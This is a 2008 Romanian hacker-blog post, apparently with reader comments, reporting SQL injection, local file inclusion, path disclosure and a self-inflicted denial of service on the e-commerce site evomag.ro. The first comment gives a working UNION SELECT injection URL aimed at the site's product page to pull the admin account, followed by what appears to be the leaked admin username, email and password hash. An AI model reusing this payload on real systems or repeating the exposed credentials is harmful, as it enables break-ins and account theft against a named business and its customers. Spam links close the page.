Loading....
Loading....

    Posted by Shocker in English News

    Posted on November 26th, 2008

    Un LFI-ul evident cu un rezultat amuzant in cazul includerii fisierului care se ocupa de include-uri (loader.php):

    (in dreapta path disclosure)

    In urma unui SQL Injection, specially crafted, prin produse.php… self denial of service, asistam la moartea serverului SQL:

    Related Posts

    3 Responses to “Evomag.ro, SQL Injection, Self DoS, Path Disclosure, Local File Inclusion”

    1. unu Says:

      si sintaxa pt parola adminului
      http://www.evomag.ro/produs.php?produs_id=12349999%20uNion%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(username,0×3a,email,0×3a,password),30,31,32%20from%20users limit 0,1–
      admin:office@evomag.ro:6a7c88a8ca307cb48e06953690e1463e

    2. crs12decoder Says:

      Q: de ce nu ai lasat adresa si la 3rd picture?

    3. HackersBlog » Blog Archive » Evomag spart. Oare pentru a cata oara? Says:

      [...] Un alt articol despre evomag: http://www.hackersblog.org/2008/11/26/evomagro-sql-injection-self-dos-path-disclosure-local-file-inc… [...]

    Leave a Reply

    Studio videochat bucuresti Studio videochat Bucuresti
    Download Muzica Filme
    Studio videochat Iasi videochat Iasi